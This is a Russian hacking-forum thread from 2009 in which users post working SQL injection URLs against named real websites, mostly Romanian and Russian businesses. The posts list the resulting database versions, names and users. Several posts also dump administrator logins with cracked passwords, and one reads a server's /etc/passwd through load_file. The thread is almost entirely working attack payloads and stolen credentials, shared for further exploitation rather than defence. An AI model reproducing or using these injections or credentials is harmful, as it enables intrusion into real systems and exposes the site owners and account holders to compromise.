ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #8481  
Старый 20.03.2009, 19:35
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.accordgrup.ro/produse-detalii.php?id=-11+union+select+1,2,3,concat_ws(0x3a,version(),dat abase(),useR()),5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19&meniu=&ex=&lb=ro


Database Version: 5.0.37
Database name: accordgrup
User name: accordgrup@localhost


http://www.weissprofil.ro/produse.php?id=-29+union+select+1,concat_ws(0x3a,version(),databas e(),user()),3,4,5


Database Version: 5.0.45-log
Database name: weissprofil
User name: weissprofil@core3.hostbase.net



http://www.wert.ro/lucrari.php?d=5&f=-13+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user()),4,5,6,7&lb=en&p=1


Database Version: 5.0.24a-Debian_9
Database name: wert
User name: wert@localhost



http://www.metroplex.ro/produse.php?ct=-4+union+select+1,2,concat_ws(0x3a,version(),databa se(),useR()),4&t=p#15


Database Version: 5.0.45-log
Database name: metroplex
User name: metroplex@core3.hostbase.net


http://www.valromexim.ro/produse-detalii.php?id=-24+union+select+1,2,3,concat_ws(0x3a,version(),dat abase(),useR()),5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27--


Database Version: 5.0.45-log
Database name: valromexim
User name: valromexim@core3.hostbase.net


http://www.mementomori.ro/produse-detalii.php?id=-1443+union+select+1,2,3,4,5,concat_ws(0x3a,version (),database(),useR()),7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29

Database Version: 5.0.22
Database name: mementomori
User name: mementomori@localhost


http://www.dpnet.ro/produse-detalii.php?id=-76+UNION+SELECT+1,2,3,4,5,6,concat_ws(0x3a,version (),database(),useR()),8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28--


Database Version: 5.0.67-community
Database name: rdpn0104_dpnet
User name: rdpn0104_dpnet@localhost
 
Ответить с цитированием

  #8482  
Старый 20.03.2009, 20:18
Аватар для .:[melkiy]:.
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740

Репутация: 912
По умолчанию

Цитата:
http://www.arm-52.ru/news/?id=-30+union+Select+1,2,3,4,5,6,7,8--
Database Version: 4.0.25
Database name: autorynok
User name: autorynok@localhost


Цитата:
http://pro-technologies.ru/news/?id=-30+union+select+1,2,3,4,5,6--
Database Version: 4.1.22-log
Database name: wwwprotechnologi
User name: protechn@localhost

Последний раз редактировалось .:[melkiy]:.; 20.03.2009 в 21:03..
 
Ответить с цитированием

  #8483  
Старый 20.03.2009, 21:00
Аватар для f1ng3r
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
Отправить сообщение для f1ng3r с помощью ICQ
По умолчанию

Код:
http://www.hs-ships.ru/new.phtm?i=-1+union+select+1,2,concat_ ws(0x3a,version(),database(),user()),4,5--
Database Version : 4.1.22-WWW
Database name : flot_search
User name : flot@localhost
 
Ответить с цитированием

  #8484  
Старый 20.03.2009, 21:25
Аватар для .:[melkiy]:.
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740

Репутация: 912
По умолчанию

Цитата:
http://www.bezanti.ru/news/?id=-30+union+select+1,2,3,4,5--
Database Version: 5.0.45-log
Database name: u91998
User name: u91998@10.10.12.156


admin:c4ca4238a0b923820dcc509a6f75849b ~ 1
keeper:c4ca4238a0b923820dcc509a6f75849b ~ 1
леночка:f66786da44fda0a3fff3596281989647 ~ 20062003
абакан:c7736e57315df784b4f7094019fc13be ~ antares
Алексей:153c4797e9d1f5010b2ceb71f3160223 ~ ??
user:c7736e57315df784b4f7094019fc13be ~ antares
antares:827ccb0eea8a706c4c34a16891f84e7b ~ 12345
luba:405e28906322882c5be9b4b27f4c35fd ~ 1978

Цитата:
http://www.preciseconsult.net/show.php?id=-11+union+select+1,2,3,4,5,6,7,8--
Database Version: 5.0.67-community
Database name: precisec_pbc
User name: precisec_pbc@localhost

Login: admin
Pass: PbCaDmInCmS

Последний раз редактировалось jokester; 20.03.2009 в 21:49.. Причина: freepoc.org БОЯН
 
Ответить с цитированием

  #8485  
Старый 20.03.2009, 21:38
Аватар для z00MAN
z00MAN
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980

Репутация: 930
По умолчанию

PM Team
Код:
http://www.pmteam.ru/blogs/?id=20+union+select+1,2,3,concat(version(),0x3a,user(),0x3a,database())/*
user(): wwwpmteamru
database(): pmteam01@localhost
version(): 4.1.22-log
тИЦ=20
PR=4


table users
Код:
http://www.pmteam.ru/blogs/?id=20+union+select+1,concat(id,0x3a,login,0x3a,password),3,4+from+users/*
PHP код:
20:mart:aprel
13
:Admin:qweasd
14
:emorgun:1234567
9
:SFilippenko:figvam
22
:SVN:bwdm604
15
:ekaterina:4979408 
ООО Издательский дом ВИАМ
Код:
http://www.viam.spb.ru/cont/cont_paper.php?id=20'+union+select+1,2,3,concat(version(),0x3a,user(),0x3a,database()),5,6,7/*
user(): viam
database(): viam@localhost
version(): 4.0.27-log

тИЦ=100
PR=4


AFPC
Код:
http://www.afpc-cartes.com/actus.php?id=20+union+select+1,2,3,4,5,6,7,concat(version(),0x3a,user(),0x3a,database()),9,10,11,12,13--
user(): afpc
database(): afpc2005@localhost
version(): 4.0.24_Debian-10sarge2-log

PR=4

Последний раз редактировалось jokester; 20.03.2009 в 21:55.. Причина: crocus-expo.ru БОЯН Дальневосточный Государственный Университет ГДЕ ЛИНК?
 
Ответить с цитированием

  #8486  
Старый 21.03.2009, 00:32
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://animassacre.com/news.php?id=-41+union+select+1,2,3,4,concat_ws(0x3a,version(),d atabase(),useR())


Database Version: 5.0.51a-community
Database name: juck_animassasite
User name: juck_animassaani@localhost
 
Ответить с цитированием

  #8487  
Старый 21.03.2009, 03:25
Аватар для FaR-G9
FaR-G9
Участник форума
Регистрация: 19.12.2006
Сообщений: 159
Провел на форуме:
896935

Репутация: 64
Отправить сообщение для FaR-G9 с помощью ICQ
По умолчанию

http://www.spb-online.ru/news.php?id=12+UNION+SELECT+1,concat_ws(0x3a,versi on(),database(),user()),3,4+LIMIT+1,1/*

Database Version: 4.1.25
Database name: spbonline_spb
User name: spbonline_spb@localhost


http://www.ringator.ru/cat.php?p=37'+UNION+SELECT+1,AES_DECRYPT(AES_ENCRY PT(concat(version(),database(),user()),0x71),0x71) +LIMIT+1,1/*

Database Version: 4.1.13
Database name: geeload_ringator
User name: geeload_ringator@localhost
 
Ответить с цитированием

  #8488  
Старый 21.03.2009, 09:56
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

Pagerank: 6

http://www.seenews.com/_c/SaveAs.php?Id=-137535+UNION+SELECT+1,concat_ws(0x3a,version(),dat abase(),useR()),3,4,5,6&Type=3


Database Version: 5.1.16-beta-Debian_3-log
Database name: SeeNewsUTF
User name: root@localhost


http://www.seenews.com/_c/SaveAs.php?Id=-137535+UNION+SELECT+1,load_file(0x2f6574632f706173 737764),3,4,5,6&Type=3

root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/bin/shbin:x:2:2:bin:/bin:/bin/shsys:x:3:3:sys:/dev:/bin/shsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/bin/shman:x:6:12:man:/var/cache/man:/bin/shlp:x:7:7:lp:/var/spool/lpd:/bin/shmail:x:8:8:mail:/var/mail:/bin/shnews:x:9:9:news:/var/spool/news:/bin/shuucp:x:10:10:uucp:/var/spool/uucp:/bin/shproxy:x:13:13roxy:/bin:/bin/shwww-data:x:33:33:www-data:/var/www:/bin/shbackup:x:34:34:backup:/var/backups:/bin/shlist:x:38:38:Mailing List Manager:/var/list:/bin/shirc:x:39:39:ircd:/var/run/ircd:/bin/shgnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/shnobody:x:65534:65534:nobody:/nonexistent:/bin/shDebian-exim:x:100:102::/var/spool/exim4:/bin/falsestatd:x:101:65534::/var/lib/nfs:/bin/falseidentd:x:102:65534::/var/run/identd:/bin/falseit:x:1000:1000:it,,,:/home/it:/bin/bashsshd:x:103:65534::/var/run/sshd:/usr/sbin/nologinmysql:x:104:104:MySQL Server,,,:/var/lib/mysql:/bin/falsepublisher:x:1001:33:SeeNews Publisher,,,:/var/publisher/:/bin/bashbacula:x:105:105:Bacula:/var/lib/bacula:/bin/false

интересная скуля по моему мнению, так как вывод информации из БД осуществляется в открывающимся документе ворд... для меня это было что то новое.
 
Ответить с цитированием

  #8489  
Старый 21.03.2009, 13:17
Аватар для .:[melkiy]:.
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740

Репутация: 912
По умолчанию

Цитата:
http://reverans.info/index.php?action=news&id=-1+union+select+1,2,3--
Database Version: 5.0.75-percona-highperf-b11-log
Database name: a6659_reverans
User name: a6659_reverans@94.103.80.170

Login: admin
Pass: 12345


Цитата:
http://mgauto.ru/main.php?page=news&id=-1+union+select+1,2,3,4,5,6,7--

Database Version: 5.0.67-log
Database name: u94915_bestfas
User name: u94915@10.10.223.241

Login: root
Pass: privetArena


Цитата:
http://www.avkgroup.ru/?m=news&id=-1+union+select+1,unhex(hex(concat_ws(0x3a,version( )))),3,4,5,6--
Database Version: 5.0.67-log
Database name: u47054
User name: u47054@10.10.223.209

Login: admin
Pass: 3ceaf5c5abed0963e3e1be7fa91cf8d9 : 6164707


Цитата:
http://www.imc.com.jo/news.php?id=-38+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--
Database Version: 5.0.45-log
Database name: imcjordan
User name: imcjordan@76.12.91.164

Email: Fnijem@imc.com.jo
Pass: fadi2008

Последний раз редактировалось .:[melkiy]:.; 21.03.2009 в 13:54..
 
Ответить с цитированием

  #8490  
Старый 21.03.2009, 14:56
Аватар для f1ng3r
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
Отправить сообщение для f1ng3r с помощью ICQ
По умолчанию

Код:
http://www.speccars.ru/index.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33--
Database Version : 4.1.22-log
Database name : speccar4_sdbase
User name : speccar4_suser@localhost
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ